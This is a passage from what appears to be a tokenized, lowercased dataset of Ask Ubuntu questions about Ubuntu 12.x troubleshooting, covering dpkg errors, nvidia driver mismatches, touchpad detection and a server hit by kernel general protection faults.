/lib/modules/3.5.0-17-generic/kernel/drivers/hid/usbhid/usbhid.ko ) : operation not permitted fatal : error inserting hid_logitech_dj ( /lib/modules/3.5.0-17-generic/kernel/drivers/hid/hid-logitech-dj.ko ) : operation not permitted
237031	how i can launch my browser and nautilus using defaults ubuntu 12.04 shortcut ?	in keyboard shortcut settings i see a launcher section that have 'www ' and 'explorer ' labels inside the key combination column of the shortcut definition . what keys i must press to launch my browser and my file explorer in ubuntu 12.04 if i want use the default system shortcuts . ?
237036	how do i delete local address book contacts ?	how can i delete all my local address book contact from ubuntu 12.10 ? when i try to delete `` personal address book '' from thunder bird , i got this error sorry - this version of eds contacts integration does not support deleting evolution address books . due to the way that thunderbird tries to delete address books , all of your eds address books will appear to be removed from the address book manager . simply restart thunderbird in order to have them return . also i do not find a way to delete local contacts using `` gnome-contacts '' . extra information : all my contacts were imported from my mobile phone used `` sync '' application
237038	dual-boot bootrec /fixboot issues while uninstalling ubuntu	good day , i want to give ubuntu more hdd space so i tried to create a new partition then merge it with my ubuntu 's . windows is unable to create more that 5 partitions i decided to uninstall then re-install ubuntu . i used a recovery disk to uninstall ubuntu . i went into the command prompt and ran `` bootrec /fixboot '' the following message appeared `` the volume does not contain a recognized file system . please make sure that all the required file system drivers are loaded and that the volume is not corrupted . '' `` bootrec /fixmbr '' ran without any problems . when i turned on the computer it booted into windows 7 question - do i still need to run `` bootrec /fixboot '' or can i delete the ubuntu partition and run windows 7 without any problems ?
237039	beginner - ubuntu privacy question	search leaks : i 'm reading this article about amazon ads etc on electronic frontier foundation . well , it seems like ubuntu developers set themselves on the path of dark side . so my first question is : is it possible to completely avoid all this leaks , what eff writing about ? mysterious cite about 'trust us your data ' : this article also has a citation of mark shuttleworth 's words about privacy issues : we are not telling amazon what you are searching for . your anonymity is preserved because we handle the query on your behalf . donât trust us ? erm , we have root . you do trust us with your data already . you trust us not to screw up on your machine with every update . you trust debian , and you trust a large swathe of the open source community . and most importantly , you trust us to address it when , being human , we err . see highlighted phrase . so he says , that besides search leaks , some another data leaks a provided in ubuntu ? what about is he talking ? what is the meaning of this phrase ?
237051	undetected logitech mx 5500 keyboard and mouse	i want to install ubuntu 12.10 64 bit but i ca n't since logitech mx 5500 combo ( keyboard/mouse ) is not detected . i 'm new to ubuntu .
237052	how to resolve dpkg error code ( 1 ) ?	i get the following apt-get error message : sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up python-gobject-2-dev ( 2.28.6-10ubuntu2 ) ... traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 36 , in < module > from debpython.version import supported , debsorted , vrepr , \ file `` /usr/share/python/debpython/version.py '' , line 24 , in < module > from configparser import safeconfigparser importerror : no module named configparser dpkg : error processing python-gobject-2-dev ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : python-gobject-2-dev e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried all the tricks i know using apt-get and dpkg , but the error still exists . i do n't care if python is broken after after fixing the error .
237055	how to resolve package conflicts installing libreoffice 3.6.4 ?	the latest release of libreoffice is 3.6.4 , however only 3.6.2 is available in the software centre . i have installed the file available at http : //www.libreoffice.org/download/ ? type=deb-x86 & lang=en-gb & version=3.6.4 ( and yes i am running 32 bit 12.10 ) and have completed the installation instructions in the readme file that comes with it up to : cd desktop-integration sudo dpkg -i *.deb at which point i received the error : dpkg : regarding libreoffice3.6-debian-menus_3.6.4-3_all.deb containing libreoffice-debian-menus : libreoffice-debian-menus conflicts with libreoffice-bundled libreoffice-core provides libreoffice-bundled and is present and installed . dpkg : error processing libreoffice3.6-debian-menus_3.6.4-3_all.deb ( -- install ) : conflicting packages - not installing libreoffice-debian-menus errors were encountered while processing : libreoffice3.6-debian-menus_3.6.4-3_all.deb after which i performed : sudo apt-get remove libreoffice-bundled and restarted the last command that is : sudo dpkg -i *.deb which failed this time too .
237059	elantech touchpad stopped working after restart	i 'm using ubuntu 12.10 on my msi x460dx notebook for a few weeks . touchpad worked without problem . 2-finger scrolling worked as well as disabling touchpad with key shortcut . but now after a restart touchpad just stopped working completely . system settings- > mouse and touchpad- > touchpad tab was not here so i tried to run sudo modprobe psmouse and than it started working , but the touchpad settings still are n't here and neither edge scrolling nor 2-finger scrolling is working . i also ca n't disable it . i found out , that the touchpad is recognized as ps/2 generic mouse instead of my elantech touchpad . ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ a4tech usb device id=10 [ slave pointer ( 2 ) ] ⎜ ↳ a4tech usb device id=11 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] is there a way how can i get my touchpad working properly as before ?
237063	force file extension to open with specific app ( extensions like .exe , .jpg , .mp4 ... )	i have already read the question about creating .desktop files to use on the `` open with other application '' tab but this is not what i want , i want to be able to click on the file in dash or in nautilus and be able to open it with the specified app . for example i have this case right now : when i click on an exe file it does not get executed by wine , instead i get the following : if i try to look for wine in the open with context menu option it is there . i am fine executing it from there the first time , but then the following times wine does not appears selected in the main context menu : i then went to properties to the open with tab to look for wine . it was not in the default apps nor was it in the recommended ones when i clicked and search on show other applications this is not limited to exe extensions . it also has happened with mkv files , mp4 files , jpg , png , mp3 and even svg and css . so instead of trying to find a way of solving it for one , i want a way that can be done to any type of extension that can : make the app the default of that extension appear on the context menu in nautilus when i right click on the file appears on the `` open with '' tab on the property window of the file correctly executes the specified app when i click on the file with dash this might sound like it should be common sense for an app to execute the file but it does not always work like that . so for the cases where it actually does not work , how to fix it . a reset of the extension ? , an update of the files that can open said extension ? , an addition of the app via a command line or gui tool ?
237066	where is the `` pysdm '' package ?	i am new to ubuntu . i have some old hardware lying around so i decided to build a backup/storage device . i am trying to follow this lifehacker article . it asks me to open a terminal and run sudo apt-get install pysdm . however , i keep getting unable to locate package pysdm . does anyone know where my pysdm is or where i can get one . i have run ubuntu from a usb key and have installed it on a hard drive and get the same message .
237077	does 12.04 lxde have lts ?	this question sparked my question . will my pc receive the long term support ( lts ) using lxde in ubuntu 12.04 ? what does it mean that lubuntu does n't have long term support ? does it just mean it 's not explicitly tested with new hardware and does n't get point releases ? or does it mean that lxde packages do n't get the same kind of community support as community-supported packages that more commonly appear in ubuntu installations ?
237080	update manager updates the kernel mod but not the nvidia client , how to get them to match ?	12.04 update on 2012-12-22 updated the kernel to 3.2.0-35-generic and attempted to update nvidia driver to nvidia-experimental-310 310.14-0ubuntu0.1 but did not . update on 2013-01-06 update manager updated the kernel module to nvidia-experimental-310 310.14-0ubuntu0.1 but apparently did not update the actual driver , leaving it at 304.43 . so after the update , x fails due to kernel mod/graphics driver mismatch . this leaves me with only a console . this system is a straight up install with ubuntu provided proprietary nvidia drivers . what do i need to do from console to get the client & kernel version to match ? jockey.log is here , and here are other log extracts : from dpkg.log 2012-12-22 10:15:29 configure linux-image-3.2.0-35-generic 3.2.0-35.55 < none > 2012-12-22 10:15:29 status unpacked linux-image-3.2.0-35-generic 3.2.0-35.55 2012-12-22 10:15:29 status half-configured linux-image-3.2.0-35-generic 3.2.0-35.55 2012-12-22 10:16:47 status installed linux-image-3.2.0-35-generic 3.2.0-35.55 skip 2012-12-22 10:54:19 install nvidia-experimental-310 < none > 310.14-0ubuntu0.1 2012-12-22 10:54:19 status half-installed nvidia-experimental-310 310.14-0ubuntu0.1 2012-12-22 10:54:27 status triggers-pending man-db 2.6.1-2 2012-12-22 10:54:27 status half-installed nvidia-experimental-310 310.14-0ubuntu0.1 2012-12-22 10:54:27 status triggers-pending desktop-file-utils 0.20-0ubuntu3propietary 2012-12-22 10:54:27 status half-installed nvidia-experimental-310 310.14-0ubuntu0.1 2012-12-22 10:54:27 status triggers-pending gnome-menus 3.4.0-0ubuntu1 2012-12-22 10:54:27 status half-installed nvidia-experimental-310 310.14-0ubuntu0.1 2012-12-22 10:54:32 status unpacked nvidia-experimental-310 310.14-0ubuntu0.1 2012-12-22 10:54:32 status unpacked nvidia-experimental-310 310.14-0ubuntu0.1 2012-12-22 10:54:32 install nvidia-settings-experimental-310 < none > 310.14-0ubuntu0.1 2012-12-22 10:54:32 status half-installed nvidia-settings-experimental-310 310.14-0ubuntu0.1 2012-12-22 10:54:32 status not-installed nvidia-settings-experimental-310 < none > skip 2013-01-06 10:59:13 startup packages configure 2013-01-06 10:59:13 configure nvidia-experimental-310 310.14-0ubuntu0.1 < none > 2013-01-06 10:59:13 status unpacked nvidia-experimental-310 310.14-0ubuntu0.1 2013-01-06 10:59:13 status unpacked nvidia-experimental-310 310.14-0ubuntu0.1 2013-01-06 10:59:13 status half-configured nvidia-experimental-310 310.14-0ubuntu0.1 2013-01-06 11:00:51 status installed nvidia-experimental-310 310.14-0ubuntu0.1 from syslog jan 6 11:22:50 64bitwrksta kernel : [ 0.000000 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-35-generic root=uuid=98396955-e718-4c04-83fa-b23dbb537615 ro quiet splash skip jan 6 11:22:53 64bitwrksta kernel : [ 32.642878 ] nvrm : api mismatch : the client has the version 304.43 , but jan 6 11:22:53 64bitwrksta kernel : [ 32.642880 ] nvrm : this kernel module has the version 310.14 . please jan 6 11:22:53 64bitwrksta kernel : [ 32.642880 ] nvrm : make sure that this kernel module and all nvidia driver jan 6 11:22:53 64bitwrksta kernel : [ 32.642881 ] nvrm : components have the same version . jan 6 11:22:53 64bitwrksta kernel : [ 32.643200 ] nvrm : api mismatch : the client has the version 304.43 , but jan 6 11:22:53 64bitwrksta kernel : [ 32.643201 ] nvrm : this kernel module has the version 310.14 . please jan 6 11:22:53 64bitwrksta kernel : [ 32.643202 ] nvrm : make sure that this kernel module and all nvidia driver jan 6 11:22:53 64bitwrksta kernel : [ 32.643203 ] nvrm : components have the same version .
237081	how do i uninstall nixnote	i downloaded and installed the 32-bit nixnote package from sourceforge . it was 1.4 version .deb package download , and when i clicked on it , software center opened , and i installed through software center . but when i tried to find it to uninstall , it is nowhere to be found in software center . i do i uninstall it then ?
237083	how do i apply a custom font system-wide for all users ?	i have installed the 'droid ' font . the left one root nautilus , the right one normal nautilus . why are the fonts different ? ( specifically look at menus ) i want both windows to use the same font . am i wrong ? i got `` droid '' folder from elementary os and pasted it into /usr/share/fonts/truetype/droid and selected the font with tweak tool .
237090	tons of general protection faults	i recently upgraded my home server from ubuntu 10.04 to 12.04.1 . it runs the linux-image-server kernel , x86_64 arch . there 's nothing particularly unusual running , i think -- a deluge daemon , apache2 , iptables firewall with ip masquerading , dhcp server , bind dns server which has zone files updated automatically with the hostnames dhcp clients identify themselves with , sshd , nfs server , a handful of other things . this machine is my router -- it sits between the internet and the local network . since the upgrade it has been failing intermittently . it 'll be fine for a while after booting and then suddenly we 'll lose our network connections on wifi . if i plug in a network cable i ca n't get an ip address from the dhcp server . if i set myself a static ip address i can continue to access the internet just fine . this makes it look like it 's the dhcp server that fails ( indeed , i run dhclient -v eth0 and nothing responds to the dhcpdiscover shoutouts ) , noticed when the clients try to renew their ip leases . but wired with a static ip i can still get to the internet , so iptables is still chugging along just fine . so i try to log in to the machine over ssh , but it seems to hang . if i make ssh verbose i see that it does establish a connection to the server , then fails a little further down the line -- hard to see where exactly . i note that if i try to grab a web page from its http server i get the page i request but any extra requests made ( for images , stylesheets , javascripts ) are not served . i can however get these files if i request them directly , for instance from curl . is this suggesting that things are going downhill whenever something attempts to fork ? i dragged a monitor and keyboard to the server ( it 's usually headless ) and had a look -- i see stack traces . i switch to a fresh virtual terminal and attempt to log in . i get a stack trace ( general protection fault ) after entering my password . here it is : jan 6 20:19:54 localhost kernel : [ 1475.178245 ] general protection fault : 0000 [ # 12 ] smp jan 6 20:19:54 localhost kernel : [ 1475.178292 ] cpu 1 jan 6 20:19:54 localhost kernel : [ 1475.178309 ] modules linked in : btrfs zlib_deflate libcrc32c ufs qnx4 hfsplus hfs minix ntfs vfat msdos fat jfs xfs reiserfs ext2 nfsd nfs lockd fscache auth_rpcgss nfs_acl sunrpc dm_crypt ppdev ipt_reject ipt_log ipt_masquerade xt_state iptable_mangle iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 iptable_filter ip_tables x_tables joydev sp5100_tco edac_core i2c_piix4 serio_raw k8temp edac_mce_amd snd_hda_codec_hdmi snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_timer snd soundcore parport_pc snd_page_alloc mac_hid shpchp lp parport radeon 8139too ttm drm_kms_helper drm pata_atiixp i2c_algo_bit usbhid hid wmi r8169 jan 6 20:19:54 localhost kernel : [ 1475.178911 ] jan 6 20:19:54 localhost kernel : [ 1475.178927 ] pid : 1305 , comm : login tainted : g b d 3.2.0-35-generic # 55-ubuntu gigabyte technology co. , ltd. ga-ma785gm-us2h/ga-ma785gm-us2h jan 6 20:19:54 localhost kernel : [ 1475.179028 ] rip : 0010 : [ < ffffffff8116589a > ] [ < ffffffff8116589a > ] kmem_cache_alloc+0x5a/0x140 jan 6 20:19:54 localhost kernel : [ 1475.179096 ] rsp : 0018 : ffff88006b251d78 eflags : 00010206 jan 6 20:19:54 localhost kernel : [ 1475.179135 ] rax : 0000000000000000 rbx : 00007f062bb91000 rcx : 000000000005b2ed jan 6 20:19:54 localhost kernel : [ 1475.179186 ] rdx : 000000000005b2ec rsi : 0000000000016da0 rdi : ffff88006d408a00 jan 6 20:19:54 localhost kernel : [ 1475.179236 ] rbp : ffff88006b251dc8 r08 : ffff88006fa96da0 r09 : 0000000000000001 jan 6 20:19:54 localhost kernel : [ 1475.179287 ] r10 : 00000000000000d1 r11 : ffff88006b23a8f0 r12 : ffff88006d408a00 jan 6 20:19:54 localhost kernel : [ 1475.179336 ] r13 : 2665c4979a04b7b8 r14 : ffffffff811447c5 r15 : 00000000000080d0 jan 6 20:19:54 localhost kernel : [ 1475.179387 ] fs : 00007f062bb81700 ( 0000 ) gs : ffff88006fa80000 ( 0000 ) knlgs:0000000000000000 jan 6 20:19:54 localhost kernel : [ 1475.179445 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 jan 6 20:19:54 localhost kernel : [ 1475.179486 ] cr2 : 00007f9b4d79da00 cr3 : 0000000059a34000 cr4 : 00000000000006e0 jan 6 20:19:54 localhost kernel : [ 1475.179536 ] dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 jan 6 20:19:54 localhost kernel : [ 1475.179586 ] dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000400 jan 6 20:19:54 localhost kernel : [ 1475.179637 ] process login ( pid : 1305 , threadinfo ffff88006b250000 , task ffff880036058000 ) jan 6 20:19:54 localhost kernel : [ 1475.179695 ] stack : jan 6 20:19:54 localhost kernel : [ 1475.179711 ] ffff880036058000 0000000000000041 0000000000000001 ffffffff81188cec jan 6 20:19:54 localhost kernel : [ 1475.179777 ] 0000000000000282 00007f062bb91000 ffff88006822ce00 0000000000000001 jan 6 20:19:54 localhost kernel : [ 1475.179841 ] 0000000000001000 0000000000000000 ffff88006b251e88 ffffffff811447c5 jan 6 20:19:54 localhost kernel : [ 1475.179905 ] call trace : jan 6 20:19:54 localhost kernel : [ 1475.179928 ] [ < ffffffff81188cec > ] ? path_openat+0xfc/0x3f0 jan 6 20:19:54 localhost kernel : [ 1475.179971 ] [ < ffffffff811447c5 > ] mmap_region+0x2a5/0x4f0 jan 6 20:19:54 localhost kernel : [ 1475.180012 ] [ < ffffffff81144d58 > ] do_mmap_pgoff+0x348/0x360 jan 6 20:19:54 localhost kernel : [ 1475.180054 ] [ < ffffffff81144e36 > ] sys_mmap_pgoff+0xc6/0x230 jan 6 20:19:54 localhost kernel : [ 1475.180098 ] [ < ffffffff81018b12 > ] sys_mmap+0x22/0x30 jan 6 20:19:54 localhost kernel : [ 1475.180136 ] [ < ffffffff816655c2 > ] system_call_fastpath+0x16/0x1b jan 6 20:19:54 localhost kernel : [ 1475.180180 ] code : 00 4d 8b 04 24 65 4c 03 04 25 50 da 00 00 49 8b 50 08 4d 8b 28 4d 85 ed 0f 84 d8 00 00 00 49 63 44 24 20 49 8b 34 24 48 8d 4a 01 < 49 > 8b 5c 05 00 4c 89 e8 65 48 0f c7 0e 0f 94 c0 84 c0 74 c2 4d jan 6 20:19:54 localhost kernel : [ 1475.180503 ] rip [ < ffffffff8116589a > ] kmem_cache_alloc+0x5a/0x140 jan 6 20:19:54 localhost kernel : [ 1475.180552 ] rsp < ffff88006b251d78 > jan 6 20:19:54 localhost kernel : [ 1475.180603 ] -- - [ end trace 766ef1ef52f774b9 ] -- - if i watch long enough , i see more general protection faults . i 've seen them for login , apache2 , deluge-web , head , powerbtn.sh so far . i have to hard reset the machine to get it back to a working state ( i even get a general protection fault for powerbtn.sh when i hit the power button ) , but it 's not long before it gets like this again . i have n't yet figured out how to reproduce this on demand -- it seems to happen randomly . in case it 's useful , i looked through kern.log and found the first such fault . there 's a ton of them all in a row starting with zsh , then deluged , apache2 , cron , head , console-kit-dae , irqbalance , nmbd ... here 's the zsh one and the bad page state error which comes right after : jan 6 20:13:35 localhost kernel : [ 1096.184250 ] general protection fault : 0000 [ # 1 ] smp jan 6 20:13:35 localhost kernel : [ 1096.186339 ] cpu 1 jan 6 20:13:35 localhost kernel : [ 1096.186355 ] modules linked in : btrfs zlib_deflate libcrc32c ufs qnx4 hfsplus hfs minix ntfs vfat msdos fat jfs xfs reiserfs ext2 nfsd nfs lockd fscache auth_rpcgss nfs_acl sunrpc dm_crypt ppdev ipt_reject ipt_log ipt_masquerade xt_state iptable_mangle iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 iptable_filter ip_tables x_tables joydev sp5100_tco edac_core i2c_piix4 serio_raw k8temp edac_mce_amd snd_hda_codec_hdmi snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_timer snd soundcore parport_pc snd_page_alloc mac_hid shpchp lp parport radeon 8139too ttm drm_kms_helper drm pata_atiixp i2c_algo_bit usbhid hid wmi r8169 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] jan 6 20:13:35 localhost kernel : [ 1096.188008 ] pid : 2564 , comm : zsh not tainted 3.2.0-35-generic # 55-ubuntu gigabyte technology co. , ltd. ga-ma785gm-us2h/ga-ma785gm-us2h jan 6 20:13:35 localhost kernel : [ 1096.188008 ] rip : 0010 : [ < ffffffff8116589a > ] [ < ffffffff8116589a > ] kmem_cache_alloc+0x5a/0x140 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] rsp : 0018 : ffff880059877d78 eflags : 00010206 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] rax : 0000000000000000 rbx : 00007f202c59d000 rcx : 000000000005b2ed jan 6 20:13:35 localhost kernel : [ 1096.188008 ] rdx : 000000000005b2ec rsi : 0000000000016da0 rdi : ffff88006d408a00 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] rbp : ffff880059877dc8 r08 : ffff88006fa96da0 r09 : 0000000000000001 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] r10 : 0000000000100073 r11 : ffff880059dbb2c0 r12 : ffff88006d408a00 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] r13 : 2665c4979a04b7b8 r14 : ffffffff811447c5 r15 : 00000000000080d0 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] fs : 00007f202c5ac700 ( 0000 ) gs : ffff88006fa80000 ( 0000 ) knlgs:0000000000000000 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] cr2 : 00000000025991f0 cr3 : 0000000059dbc000 cr4 : 00000000000006e0 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000400 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] process zsh ( pid : 2564 , threadinfo ffff880059876000 , task ffff88006b6b5c00 ) jan 6 20:13:35 localhost kernel : [ 1096.188008 ] stack : jan 6 20:13:35 localhost kernel : [ 1096.188008 ] 0000000000000001 0000000000001000 0000000000000001 ffffffff8129e2e0 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] 0000000000000001 00007f202c59d000 ffff88006822f480 0000000000000001 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] 0000000000001000 0000000000000000 ffff880059877e88 ffffffff811447c5 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] call trace : jan 6 20:13:35 localhost kernel : [ 1096.188008 ] [ < ffffffff8129e2e0 > ] ? cap_vm_enough_memory+0x50/0x60 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] [ < ffffffff811447c5 > ] mmap_region+0x2a5/0x4f0 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] [ < ffffffff81144d58 > ] do_mmap_pgoff+0x348/0x360 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] [ < ffffffff81144eb1 > ] sys_mmap_pgoff+0x141/0x230 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] [ < ffffffff81018b12 > ] sys_mmap+0x22/0x30 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] [ < ffffffff816655c2 > ] system_call_fastpath+0x16/0x1b jan 6 20:13:35 localhost kernel : [ 1096.188008 ] code : 00 4d 8b 04 24 65 4c 03 04 25 50 da 00 00 49 8b 50 08 4d 8b 28 4d 85 ed 0f 84 d8 00 00 00 49 63 44 24 20 49 8b 34 24 48 8d 4a 01 < 49 > 8b 5c 05 00 4c 89 e8 65 48 0f c7 0e 0f 94 c0 84 c0 74 c2 4d jan 6 20:13:35 localhost kernel : [ 1096.188008 ] rip [ < ffffffff8116589a > ] kmem_cache_alloc+0x5a/0x140 jan 6 20:13:35 localhost kernel : [ 1096.188008 ] rsp < ffff880059877d78 > jan 6 20:13:35 localhost kernel : [ 1096.274513 ] -- - [ end trace 766ef1ef52f774ae ] -- - jan 6 20:13:37 localhost kernel : [ 1097.836149 ] bug : bad page state in process swapper/0 pfn:59a33 jan 6 20:13:37 localhost kernel : [ 1097.838885 ] page : ffffea0001668cc0 count:0 mapcount : -1 mapping : ( null ) index:0xffff880059a33160 jan 6 20:13:37 localhost kernel : [ 1097.841673 ] page flags : 0x100000000000000 ( ) jan 6 20:13:37 localhost kernel : [ 1097.844440 ] modules linked in : btrfs zlib_deflate libcrc32c ufs qnx4 hfsplus hfs minix ntfs vfat msdos fat jfs xfs reiserfs ext2 nfsd nfs lockd fscache auth_rpcgss nfs_acl sunrpc dm_crypt ppdev ipt_reject ipt_log ipt_masquerade xt_state iptable_mangle iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 iptable_filter ip_tables x_tables joydev sp5100_tco edac_core i2c_piix4 serio_raw k8temp edac_mce_amd snd_hda_codec_hdmi snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_timer snd soundcore parport_pc snd_page_alloc mac_hid shpchp lp parport radeon 8139too ttm drm_kms_helper drm pata_atiixp i2c_algo_bit usbhid hid wmi r8169 jan 6 20:13:37 localhost kernel : [ 1097.856881 ] pid : 0 , comm : swapper/0 tainted : g d 3.2.0-35-generic # 55-ubuntu jan 6 20:13:37 localhost kernel : [ 1097.860020 ] call trace : jan 6 20:13:37 localhost kernel : [ 1097.863063 ] < irq > [ < ffffffff8111fe8f > ] bad_page.part.61+0x9f/0xf0 jan 6 20:13:37 localhost kernel : [ 1097.866119 ] [ < ffffffff8111fef8 > ] bad_page+0x18/0x30 jan 6 20:13:37 localhost kernel : [ 1097.869158 ] [ < ffffffff8112098e > ] free_pages_prepare+0x10e/0x120 jan 6 20:13:37 localhost kernel : [ 1097.872178 ] [ < ffffffff81120af9 > ] free_hot_cold_page+0x49/0x1a0 jan 6 20:13:37 localhost kernel : [ 1097.875183 ] [ < ffffffff81120c7d > ] __free_pages+0x2d/0x40 jan 6 20:13:37 localhost kernel : [ 1097.878163 ] [ < ffffffff8159a8fb > ] tcp_v4_destroy_sock+0x25b/0x2c0 jan 6 20:13:37 localhost kernel : [ 1097.881105 ] [ < ffffffff81582695 > ] inet_csk_destroy_sock+0x55/0x140 jan 6 20:13:37 localhost kernel : [ 1097.883970 ] [ < ffffffff815849b0 > ] tcp_done+0x50/0x90 jan 6 20:13:37 localhost kernel : [ 1097.886853 ] [ < ffffffff81591d92 > ] tcp_rcv_state_process+0x422/0x5f0 jan 6 20:13:37 localhost kernel : [ 1097.889724 ] [ < ffffffff8159a597 > ] tcp_v4_do_rcv+0xc7/0x1d0 jan 6 20:13:37 localhost kernel : [ 1097.892513 ] [ < ffffffff8159c1f1 > ] tcp_v4_rcv+0x581/0x820 jan 6 20:13:37 localhost kernel : [ 1097.895301 ] [ < ffffffff81577b60 > ] ? ip_rcv_finish+0x370/0x370 jan 6 20:13:37 localhost kernel : [ 1097.898110 ] [ < ffffffff81577b60 > ] ? ip_rcv_finish+0x370/0x370 jan 6 20:13:37 localhost kernel : [ 1097.900915 ] [ < ffffffff81577c3d > ] ip_local_deliver_finish+0xdd/0x280 jan 6 20:13:37 localhost kernel : [ 1097.903716 ] [ < ffffffff81577fa8 > ] ip_local_deliver+0x88/0x90 jan 6 20:13:37 localhost kernel : [ 1097.906502 ] [ < ffffffff815778fd > ] ip_rcv_finish+0x10d/0x370 jan 6 20:13:37 localhost kernel : [ 1097.909279 ] [ < ffffffff815781e5 > ] ip_rcv+0x235/0x300 jan 6 20:13:37 localhost kernel : [ 1097.912067 ] [ < ffffffff81613dc7 > ] ? packet_rcv_spkt+0x47/0x190 jan 6 20:13:37 localhost kernel : [ 1097.914831 ] [ < ffffffff81543446 > ] __netif_receive_skb+0x4d6/0x550 jan 6 20:13:37 localhost kernel : [ 1097.917624 ] [ < ffffffff81544230 > ] netif_receive_skb+0x80/0x90 jan 6 20:13:37 localhost kernel : [ 1097.920415 ] [ < ffffffff81536474 > ] ? __netdev_alloc_skb+0x24/0x50 jan 6 20:13:37 localhost kernel : [ 1097.923124 ] [ < ffffffffa00d6e90 > ] rtl8139_rx+0x150/0x2b0 [ 8139too ] jan 6 20:13:37 localhost kernel : [ 1097.925754 ] [ < ffffffffa00d704a > ] rtl8139_poll+0x5a/0xd0 [ 8139too ] jan 6 20:13:37 localhost kernel : [ 1097.928274 ] [ < ffffffff81544bd4 > ] net_rx_action+0x134/0x290 jan 6 20:13:37 localhost kernel : [ 1097.930698 ] [ < ffffffff8103df8b > ] ? native_safe_halt+0xb/0x10 jan 6 20:13:37 localhost kernel : [ 1097.933115 ] [ < ffffffff8106f6e8 > ] __do_softirq+0xa8/0x210 jan 6 20:13:37 localhost kernel : [ 1097.935495 ] [ < ffffffff810967f5 > ] ? do_timer+0x25/0x30 jan 6 20:13:37 localhost kernel : [ 1097.937836 ] [ < ffffffff81035dc2 > ] ? ack_apic_level+0x72/0x190 jan 6 20:13:37 localhost kernel : [ 1097.940163 ] [ < ffffffff8166782c > ] call_softirq+0x1c/0x30 jan 6 20:13:37 localhost kernel : [ 1097.942464 ] [ < ffffffff81016305 > ] do_softirq+0x65/0xa0 jan 6 20:13:37 localhost kernel : [ 1097.944778 ] [ < ffffffff8106face > ] irq_exit+0x8e/0xb0 jan 6 20:13:37 localhost kernel : [ 1097.947068 ] [ < ffffffff816680e3 > ] do_irq+0x63/0xe0 jan 6 20:13:37 localhost kernel : [ 1097.949327 ] [ < ffffffff8165d46e > ] common_interrupt+0x6e/0x6e jan 6 20:13:37 localhost kernel : [ 1097.951597 ] < eoi > [ < ffffffff8103df8b > ] ? native_safe_halt+0xb/0x10 jan 6 20:13:37 localhost kernel : [ 1097.953891 ] [ < ffffffff810900a8 > ] ? hrtimer_start+0x18/0x20 jan 6 20:13:37 localhost kernel : [ 1097.956171 ] [ < ffffffff8101c983 > ] default_idle+0x53/0x1d0 jan 6 20:13:37 localhost kernel : [ 1097.958426 ] [ < ffffffff8101cb5d > ] amd_e400_idle+0x5d/0x120 jan 6 20:13:37 localhost kernel : [ 1097.960704 ] [ < ffffffff81013236 > ] cpu_idle+0xd6/0x120 jan 6 20:13:37 localhost kernel : [ 1097.962970 ] [ < ffffffff816235ee > ] rest_init+0x72/0x74 jan 6 20:13:37 localhost kernel : [ 1097.965195 ] [ < ffffffff81cfbc03 > ] start_kernel+0x3b0/0x3bd jan 6 20:13:37 localhost kernel : [ 1097.967421 ] [ < ffffffff81cfb388 > ] x86_64_start_reservations+0x132/0x136 jan 6 20:13:37 localhost kernel : [ 1097.969660 ] [ < ffffffff81cfb140 > ] ? early_idt_handlers+0x140/0x140 jan 6 20:13:37 localhost kernel : [ 1097.971888 ] [ < ffffffff81cfb459 > ] x86_64_start_kernel+0xcd/0xdc what 's happening here ? what can i do ?
237094	how to open a new tab in the server command line ?	what are the keyboard shortcuts to manipulate tabs ( open new tab , navigate between tabs ... ) in the command line of ubuntu server 12.04 ?
